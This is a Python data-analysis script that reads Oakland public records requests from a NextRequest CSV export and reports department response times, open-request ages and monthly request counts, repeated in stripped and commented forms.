recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() def rptDeptFreq(prrTbl, deptTbl, startDate, outf): outs = open(outf, 'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept, nrecent)) outs.close() <|reserved_special_token_0|> def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist <|reserved_special_token_0|> def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate != None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() def rptDeptFreq(prrTbl, deptTbl, startDate, outf): outs = open(outf, 'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept, nrecent)) outs.close() def rptOpenPRR(prrTbl, outf): daysOpen = defaultdict(lambda : defaultdict(list)) runDate = datetime.datetime.today() for prrID in prrTbl.keys(): prr = prrTbl[prrID] opdP = 'Police Department' in prr['dept'] if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[ 'status'] == 'Due soon': recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days openYears = openDays // 365 if openYears == 0: dkey = openDays else: dkey = 1000 + openYears daysOpen[opdP][dkey].append(prrID) outs = open(outf, 'w') outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n') allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys())) allNDay = sorted(list(allNDaySet)) for nday in allNDay: if nday > 365: lbl = '> %d year' % (nday - 1000) else: lbl = '%d' % nday opdList = daysOpen[1][nday] if nday in daysOpen[1] else [] nonList = daysOpen[0][nday] if nday in daysOpen[0] else [] outs.write('%s,%d,%d,"%s","%s"\n' % (lbl, len(opdList), len(nonList ), opdList, nonList)) outs.close() def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() if __name__ == '__main__': dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/' startDate = datetime.datetime(2017, 1, 1) csvFile = dataDir + 'requests-2020-07-01-sdoran.csv' prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate) openPRRFile = dataDir + 'openPRR_200831.csv' rptOpenPRR(prr20Recent, openPRRFile) deptFreqFile = dataDir + 'deptFreq2.csv' rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile) createDateFile = dataDir + 'createDate_200831.csv' anlyzCreateDates(prr20Recent, createDateFile) clearDateDir = dataDir + 'deptClear_200831/' anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir) openOPDFile = dataDir + 'openOPD_200831.csv' rptOpenPRR(prr20Recent, openOPDFile) <|reserved_special_token_1|> <|reserved_special_token_0|> PRRDateFmt = '%Y-%m-%dT%H:%M:%S' PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f' DateTypes = {'date_received': 'recdDate', 'date_created': 'createDate', 'status_updated': 'statusUpDate'} def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date', 'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons', 'Departments', 'Format Received', 'Staff Time (hrs:minutes)', 'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date', 'Staff Cost', 'Date First Contact', 'First Contact Event', 'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date', 'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company'] DeptNorm = {'Admin: Planning, Building & Neighborhood Preserv': 'Admin: Building Inspection', 'Budget and Fiscal': 'Budget and Revenue - Revenue Division', 'City Attorney Administration Unit': 'City Attorney', 'City Auditor Unit': 'City Auditor', 'City Clerk Unit': 'City Clerk', 'Oakland Police Department': 'Police Department', 'Contracts and Compliance': 'Contracts Compliance', 'Transportation Services - Administration': 'Department of Transportation', 'Fire': 'Fire Department', 'Human Resources Management': 'Human Resources', 'Information Technology (IT)': 'Information Technology', 'Public Works Agency': 'Public Works'} CSVDTFormat = '%m/%d/%Y %H:%M:%S %p' def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate != None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() def rptDeptFreq(prrTbl, deptTbl, startDate, outf): outs = open(outf, 'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept, nrecent)) outs.close() def rptOpenPRR(prrTbl, outf): daysOpen = defaultdict(lambda : defaultdict(list)) runDate = datetime.datetime.today() for prrID in prrTbl.keys(): prr = prrTbl[prrID] opdP = 'Police Department' in prr['dept'] if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[ 'status'] == 'Due soon': recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days openYears = openDays // 365 if openYears == 0: dkey = openDays else: dkey = 1000 + openYears daysOpen[opdP][dkey].append(prrID) outs = open(outf, 'w') outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n') allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys())) allNDay = sorted(list(allNDaySet)) for nday in allNDay: if nday > 365: lbl = '> %d year' % (nday - 1000) else: lbl = '%d' % nday opdList = daysOpen[1][nday] if nday in daysOpen[1] else [] nonList = daysOpen[0][nday] if nday in daysOpen[0] else [] outs.write('%s,%d,%d,"%s","%s"\n' % (lbl, len(opdList), len(nonList ), opdList, nonList)) outs.close() def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() if __name__ == '__main__': dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/' startDate = datetime.datetime(2017, 1, 1) csvFile = dataDir + 'requests-2020-07-01-sdoran.csv' prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate) openPRRFile = dataDir + 'openPRR_200831.csv' rptOpenPRR(prr20Recent, openPRRFile) deptFreqFile = dataDir + 'deptFreq2.csv' rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile) createDateFile = dataDir + 'createDate_200831.csv' anlyzCreateDates(prr20Recent, createDateFile) clearDateDir = dataDir + 'deptClear_200831/' anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir) openOPDFile = dataDir + 'openOPD_200831.csv' rptOpenPRR(prr20Recent, openOPDFile) <|reserved_special_token_1|> '''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest Created 27 Aug 20 @author: rik@electronicArtifacts.com ''' from collections import defaultdict import csv import datetime import json import random import re import requests import sys import time import urllib import re PRRDateFmt = '%Y-%m-%dT%H:%M:%S' PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f' DateTypes = {'date_received': 'recdDate', 'date_created': 'createDate', 'status_updated': 'statusUpDate'} def freqHist3(tbl): '''python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order ''' from functools import cmp_to_key def cmpd1(a,b): "decreasing order of frequencies" return b[1] - a[1] flist = list(tbl.items()) #python3 flist.sort(key=cmp_to_key(cmpd1)) return flist AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date', 'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons', 'Departments', 'Format Received', 'Staff Time (hrs:minutes)', 'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date', 'Staff Cost', 'Date First Contact', 'First Contact Event', 'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date', 'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company'] DeptNorm = {"Admin: Planning, Building & Neighborhood Preserv": "Admin: Building Inspection", "Budget and Fiscal": "Budget and Revenue - Revenue Division", "City Attorney Administration Unit": "City Attorney", "City Auditor Unit": "City Auditor", "City Clerk Unit": "City Clerk", "Oakland Police Department": "Police Department", "Contracts and Compliance": "Contracts Compliance", "Transportation Services - Administration": "Department of Transportation", "Fire": "Fire Department", "Human Resources Management": "Human Resources", "Information Technology (IT)": "Information Technology", "Public Works Agency": "Public Works"} CSVDTFormat = '%m/%d/%Y %H:%M:%S %p' # 07/01/2020 09:54:53 AM def bldIndexTblCSV(inf,startDate=None): '''return prrIDTbl, deptTbl ''' prrTbl = {} deptTbl = defaultdict(list) # keep list of all prrIDs statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' # only used in Finance reader = csv.DictReader(open(inf,encoding = "utf8",errors='replace')) for i,entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or \ (startDate != None and prr['createDate'] < startDate): nolder += 1 continue deptStr = entry['Departments'].strip() # NB: multiple department separated by semi-colon if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[ prr['status'] ] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \ (len(prrTbl),len(deptTbl),nmultDept,ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % (nolder)) # freqList = freqHist3(deptTbl) # print('Dept,Freq') # for dept,freq in freqList: # print('"%s",%d' % (dept,freq)) freqList = freqHist3(statusTbl) print('Status,Freq') for status,freq in freqList: print('"%s",%d' % (status,freq)) return (prrTbl, deptTbl) def compHistAvg(hist): '''compute first moment ASSUME hist: value -> freq ''' sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n,float(sum) / n def compMedian(hist): '''compute MEDIAN value ASSUME hist: value -> freq ''' # only singletons thwart the search for half-way point if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n/2.) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl,outf): '''distribution of create dates ''' dateDist = defaultdict(int) nmissdate = 0 for prrID,prr in prrIDTbl.items(): # 180204 # for dtype in DateTypes.values(): # if dtype in prr: # if cdateFnd == None: # cdateFnd = prr[dtype] # else: # if prr[dtype] != cdateFnd: # cdateFnd = min([cdateFnd,prr[dtype]]) cdateFnd = prr['createDate'] if cdateFnd== None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf,'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey,dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\W','_',dept.upper()) def anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10): '''Compute average (over previous 90 days) number of days to respond to request Number requests open at month start ''' allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ] allDept.sort() nonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq nonOPDopen = defaultdict(int) # month -> freq print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID] for dept in allDept: responseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq openReqMon = defaultdict(int) # month -> freq nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] # 180228 # recdDateTime = prr['recdDate'] recdDateTime = prr['createDate'] if recdDateTime==None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month) except Exception as e: print('huh') if prr['status'] == 'Closed': # 180228 # closeDate = prr['statusUpDate'] closeDate = prr['closeDate'] if closeDate==None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 # NB: was 'Oakland Police Deparment' in 180204 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 # NB: was 'Oakland Police Deparment' in 180204 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf,'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq,avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay)) outs.close() # outf = outdir + normDept + '-nopen.csv' # outs = open(outf,'w') # outs.write('Month,NOpen\n') # for recdMonKey in allMonth: # 